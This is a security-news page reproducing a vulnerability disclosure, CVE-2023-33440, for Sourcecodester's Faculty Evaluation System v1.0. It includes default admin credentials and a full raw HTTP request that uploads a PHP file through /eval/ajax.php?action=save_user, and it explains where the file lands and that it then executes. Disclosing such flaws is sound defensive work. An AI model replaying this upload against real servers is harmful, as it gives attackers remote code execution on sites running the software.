Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-33440: bug_report/RCE-1.md at main · F14me7wq/bug_report

Sourcecodester Faculty Evaluation System v1.0 is vulnerable to arbitrary code execution via /eval/ajax.php?action=save_user.

CVE
#sql#vulnerability#windows#js#php#auth#firefox

Permalink

Cannot retrieve contributors at this time

Faculty Evaluation System v1.0 by oretnom23 has arbitrary code execution (RCE)

BUG_Author: WuQi Qi and Zhihong Tian, Guangzhou University

vendors: https://www.sourcecodester.com/php/14635/faculty-evaluation-system-using-phpmysqli-source-code.html

The program is built using the xmapp-php8.1 version

Login account: [email protected]/admin123 (Super Admin account)

Vulnerability url: ip/eval/ajax.php?action=save_user

Loophole location: Faculty Evaluation System’s “/eval/ajax.php?action=save_user” file exists arbitrary file upload (RCE)

Request package for file upload:

POST /eval/ajax.php?action=save_user HTTP/1.1 Host: 192.168.1.88 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0 Accept: */* Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate DNT: 1 X-Requested-With: XMLHttpRequest Referer: http://192.168.1.88/eval/index.php?page=edit_user&id=1 Content-Length: 818 Content-Type: multipart/form-data; boundary=---------------------------1037163726497 Cookie: PHPSESSID=qm3tmf7esa9t4jsgeln6vna57r Connection: close -----------------------------1037163726497 Content-Disposition: form-data; name="id" 1 -----------------------------1037163726497 Content-Disposition: form-data; name="firstname" Administrator -----------------------------1037163726497 Content-Disposition: form-data; name="lastname" a -----------------------------1037163726497 Content-Disposition: form-data; name="img"; filename="hack.php" Content-Type: application/octet-stream <?php phpinfo();?> -----------------------------1037163726497 Content-Disposition: form-data; name="email" [email protected] -----------------------------1037163726497 Content-Disposition: form-data; name="password" -----------------------------1037163726497 Content-Disposition: form-data; name="cpass" -----------------------------1037163726497–

The uploaded file path has returned in response.

The files will be uploaded to this directory \eval\assets\uploads

We visited the directory of the file in the browser and found that the code had been executed

Related news

Faculty Evaluation System 1.0 Shell Upload

Faculty Evaluation System version 1.0 suffers from a remote shell upload vulnerability.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907